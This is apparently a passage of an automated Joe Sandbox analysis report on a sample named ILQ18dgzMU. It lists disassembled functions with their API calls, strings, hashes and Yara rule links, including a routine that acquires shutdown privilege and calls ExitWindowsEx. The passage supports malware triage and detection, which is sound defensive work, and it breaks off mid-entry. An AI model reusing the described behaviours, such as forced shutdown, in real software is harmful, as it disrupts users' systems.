                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: sprintf
                        • String ID: DivX503b1393$XviD%04d%c
                        • API String ID: 590974362-2051605487
                        • Opcode ID: 0846252239cfcf1f1286a590c688936e0441273455b87b29c73803bc35681fd4
                        • Instruction ID: 2301304bc23882b3204e6595b636f298ac00b2ab884358f9ed0165cb50f1dbd0
                        • Opcode Fuzzy Hash: 0846252239cfcf1f1286a590c688936e0441273455b87b29c73803bc35681fd4
                        • Instruction Fuzzy Hash: 91622779600B046BE320EE25DC41B6F73D5DF89314F24882CF9AA87B92E670FA45C795
                        Function 10019900 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 174comCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.OLE32(10070454,00000000,00000001,100703C4,00000000,00000000,?,1001955D,?,?,?,?), ref: 10019953
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInstance
                        • String ID: FriendlyName
                        • API String ID: 542301482-3623505368
                        • Opcode ID: d8a17ee3f74121fb930f19bc8dfeaf305a436513e548c624500da5f166c544a9
                        • Instruction ID: fdb4728b8914ec0ab3c4d5aec504b63f3c307faae4768be76b1c5aa8f43f9c76
                        • Opcode Fuzzy Hash: d8a17ee3f74121fb930f19bc8dfeaf305a436513e548c624500da5f166c544a9
                        • Instruction Fuzzy Hash: D45146B5204341AFC700DF58C884E5ABBE9FBC9724F508A6DF5998B251C735DC8ACB62
                        Function 100121A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13shutdownCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 10012110: GetCurrentProcess.KERNEL32(00000028,?,?,10009E80,?,00000000,00000000,00000001), ref: 10012120
                          • Part of subcall function 10012110: OpenProcessToken.ADVAPI32(00000000,?,10009E80,?,00000000,00000000,00000001), ref: 10012127
                        • ExitWindowsEx.USER32(00000000,00000000), ref: 100121B6
                          • Part of subcall function 10012110: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10012157
                          • Part of subcall function 10012110: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001216F
                          • Part of subcall function 10012110: GetLastError.KERNEL32 ref: 10012175
                          • Part of subcall function 10012110: CloseHandle.KERNEL32(?), ref: 10012186
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AdjustCloseCurrentErrorExitHandleLastLookupOpenPrivilegePrivilegesValueWindows
                        • String ID: SeShutdownPrivilege
                        • API String ID: 3672536310-3733053543
                        • Opcode ID: 5517fef8afc03087660cbd113a6a24cd223a873bfd2325c0d88ebad1e3e5adcd
                        • Instruction ID: 67dc224a2aa9e1604c71efd48a56f6da66e88879c61f4a7f1f7eb84d1af0328f
                        • Opcode Fuzzy Hash: 5517fef8afc03087660cbd113a6a24cd223a873bfd2325c0d88ebad1e3e5adcd
                        • Instruction Fuzzy Hash: 0DC01274E406017AE510E3E05C47F4535419F10B01F509400BB447E1C1D5B5A2B4417A
                        Function 10001800 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: hXMV$hXMV
                        • API String ID: 0-400149659
                        • Opcode ID: ab5e3e21831d743e989cfefce99af3eb928d176e77e6d9bac1422ef75111606d
                        • Instruction ID: 33c989065322407e25cb8f1f5bd2ca5453694296b4eaa1aa3ba59fb04f65da8f
                        • Opcode Fuzzy Hash: ab5e3e21831d743e989cfefce99af3eb928d176e77e6d9bac1422ef75111606d
                        • Instruction Fuzzy Hash: DDF0F672D08785ABD700CB4ADC51BAFFBB8E745B20F34462AF564537C1D33A18018BA0
                        Function 10067E30 Relevance: 2.0, Strings: 1, Instructions: 766COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: p
                        • API String ID: 0-2181537457
                        • Opcode ID: 7c39db9e0ec0d906b9108c65f53e53820b3fba5746f7ce5fd581395e1d022252
                        • Instruction ID: 41e86213a1f147a59c20fa21054d289a45626ccde17ba1540711548f6703f367
                        • Opcode Fuzzy Hash: 7c39db9e0ec0d906b9108c65f53e53820b3fba5746f7ce5fd581395e1d022252
                        • Instruction Fuzzy Hash: 9A5218B1604B019FD354CF68C884A6BB7E6FBC8344F148A2DF99A93350EB74EA45CB51
                        Function 10068810 Relevance: 2.0, Strings: 1, Instructions: 758COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 507f68a417bd9c17953693496fa3247dced6402129aa46c9e256644bf2b629c8
                        • Instruction ID: 8edb96b3a4272df0549e4926b4838a373d3f24ba3163c90b0bd51ed45d6e35ac
                        • Opcode Fuzzy Hash: 507f68a417bd9c17953693496fa3247dced6402129aa46c9e256644bf2b629c8
                        • Instruction Fuzzy Hash: 765236B16047019FD354CF28CC84AABB7EAFBC8304F558A2DF99A87351D774AA058B52
                        Function 10069240 Relevance: 1.8, Strings: 1, Instructions: 554COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: p
                        • API String ID: 0-2181537457
                        • Opcode ID: 26f970cb58f95648d150a26665e30c163f8b2854cc42efe924966888af4b153d
                        • Instruction ID: 5c715eeafa0f921a3a09a0f77ddea77a334f01894216062ae2a35cf0c6aa5065
                        • Opcode Fuzzy Hash: 26f970cb58f95648d150a26665e30c163f8b2854cc42efe924966888af4b153d
                        • Instruction Fuzzy Hash: A02232B16087009FD354CF28C884AABB7EAFBC8704F14891DF99AD7350DB74E9458B62
                        Function 10066620 Relevance: 1.6, Strings: 1, Instructions: 381COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 4f7ec2bb730e4c4423672012a11971052ec900d1ad9542e9cd4d0756fd667301
                        • Instruction ID: 6611b376b253f343187c0e507ae7ed33692c1192b3b8083b00200ee4902dd6cd
                        • Opcode Fuzzy Hash: 4f7ec2bb730e4c4423672012a11971052ec900d1ad9542e9cd4d0756fd667301
                        • Instruction Fuzzy Hash: F8E1F2B5608705AFD344CF64CC84AABB7E9FBC8704F04892DF99A97351DB31E9058B62
                        Function 10002920 Relevance: 1.5, APIs: 1, Instructions: 10nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 10002934
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: NtdllProc_Window
                        • String ID:
                        • API String ID: 4255912815-0
                        • Opcode ID: cd21bd2416f1a32ff3a22d08b90a7fc46063fe3e610cbd224e1e98767f6be9da
                        • Instruction ID: 58df3dc0681e3f39cf6c8608bd8a8251fa6d00a740b542f493d238d21b34862f
                        • Opcode Fuzzy Hash: cd21bd2416f1a32ff3a22d08b90a7fc46063fe3e610cbd224e1e98767f6be9da
                        • Instruction Fuzzy Hash: 0CC0EAB9608351AFD604CB54C888D6BB7E9EBC8340F00C909B59A83254C770E840CB22
                        Function 10034450 Relevance: .9, Instructions: 907COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9d9f16a090a9822c87b65925c36c01c83da2fd69e56d3b890f8559d485a959b6
                        • Instruction ID: 8d0f39a7764e857a0111dc6b696445a89f71c23b2c4544006f6d76332cd398eb
                        • Opcode Fuzzy Hash: 9d9f16a090a9822c87b65925c36c01c83da2fd69e56d3b890f8559d485a959b6
                        • Instruction Fuzzy Hash: 7982463454C78A4FC735EFADC8D0495BBA3AFCA204F0DC6B8DA844F35BEA7165198681
                        Function 10033A40 Relevance: .9, Instructions: 906COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d2e9f475817bb9b1abdccdb28714aea6e5f54fc4f7c16525ef0626b9c5e327aa
                        • Instruction ID: bf144427b0604054fe254b5ae95ac1905048750d301a382c030cce08f61c0ac5
                        • Opcode Fuzzy Hash: d2e9f475817bb9b1abdccdb28714aea6e5f54fc4f7c16525ef0626b9c5e327aa
                        • Instruction Fuzzy Hash: 0882743460C34A4FC725EFADC8D0496BBA3AFCA204F4DD6B8DA944F35BE97161198781
                        Function 1004DD30 Relevance: .9, Instructions: 892COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 865f681f011bfc51ed7531c062016a43634e4af7089a4ce826a7ed70d820cb01
                        • Instruction ID: 05d3d029854a830102d08cb7be6a27ab2c98881991a7aac3d21bbd0d20da86fc
                        • Opcode Fuzzy Hash: 865f681f011bfc51ed7531c062016a43634e4af7089a4ce826a7ed70d820cb01
                        • Instruction Fuzzy Hash: 6C8259B16046459FD758CF28C880BAAB7E9FF88304F108A2DE95ACB345E730F955CB95
                        Function 10054368 Relevance: .9, Instructions: 862COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9de5fdc5f4b3a874fde3799546c37746d74c51cdfaec63d27c81076e59b1a729
                        • Instruction ID: ef95bd9b3f0fc480198c8159119873fdc878575e5a523b2807feb87c22ff7938
                        • Opcode Fuzzy Hash: 9de5fdc5f4b3a874fde3799546c37746d74c51cdfaec63d27c81076e59b1a729
                        • Instruction Fuzzy Hash: FB72613183AF7685D7C3AF608690C66F3A1BF9B146B070D568904C6819EF7FD18FA225
                        Function 10030810 Relevance: .8, Instructions: 840COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6284b2869b8ba103dccce2766efb5f186fb82f7e3dd95297e512dd59926c7121
                        • Instruction ID: a64c3d111ef276c41d9f1e34a25e8f554a700bfa178fab4cad2ff45adc5e7096
                        • Opcode Fuzzy Hash: 6284b2869b8ba103dccce2766efb5f186fb82f7e3dd95297e512dd59926c7121
                        • Instruction Fuzzy Hash: 4772583064D38E4FC725EFADC4D0496BBA3AFCA204F09C5BCDA944B35BEA7165198781
                        Function 10033110 Relevance: .8, Instructions: 840COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: df2f7d2503e981415cd3f8a09e996b88b58b6ff9c42269d1c0431f4012811861
                        • Instruction ID: 29453f4a37b923f19e096f4eae6415af50d0d9c6d3d62dff1a02729bf252c972
                        • Opcode Fuzzy Hash: df2f7d2503e981415cd3f8a09e996b88b58b6ff9c42269d1c0431f4012811861
                        • Instruction Fuzzy Hash: 8572753064C78E4FC725EFAD94D04A5BBA3AFCA204F4DC5BCDA844F32BE97165198681
                        Function 10031160 Relevance: .8, Instructions: 837COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d16f5c9226d3d431dcdf8151fe05047d972e302cbc1e418d63e5ae1e1878a2b1
                        • Instruction ID: 4e92bd89d6823c281eb356d105abb4fe3538298a00b453003041c104d6b07ca4
                        • Opcode Fuzzy Hash: d16f5c9226d3d431dcdf8151fe05047d972e302cbc1e418d63e5ae1e1878a2b1
                        • Instruction Fuzzy Hash: 0872473154C78A4FC725EFADC8D0495BBB3AFCE304F09C6B8D9844B35BEAB165198681
                        Function 10031AA0 Relevance: .7, Instructions: 735COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4417fb52c18201ff84e2c13c7527f57d1c496bcf94ab97620951fb99038a32a
                        • Instruction ID: d799e697c3810950acda283a30624a9e5e463db08a179f8dfb666a6dd3b161fc
                        • Opcode Fuzzy Hash: f4417fb52c18201ff84e2c13c7527f57d1c496bcf94ab97620951fb99038a32a
                        • Instruction Fuzzy Hash: A5424433D0C5A24BD729CB3E446449AFBE35F89208B0FD6F98D9DAB357D961980982C4
                        Function 10050B15 Relevance: .7, Instructions: 734COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 69259b9b101984c7ac87dc48b963b63b975764a80d8241cb9a7b62c0cc035241
                        • Instruction ID: 66a1101def5172d1ff3a88be3276421be9c1692652b0fd374f3964baa24fda55
                        • Opcode Fuzzy Hash: 69259b9b101984c7ac87dc48b963b63b975764a80d8241cb9a7b62c0cc035241
                        • Instruction Fuzzy Hash: 24526135839F3685E7C3AF60CA90C66F3A1BF9B146B070D568504C6819EF7F918FA225
                        Function 10051547 Relevance: .7, Instructions: 734COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f03a5385daa93753dac5558406462cd99082c2bb9a566bb8dcb4c9f34d07ea9e
                        • Instruction ID: 047e855900e161c1b4691d9c58c49a267d1314ca22ac9589435d89b10c5abb32
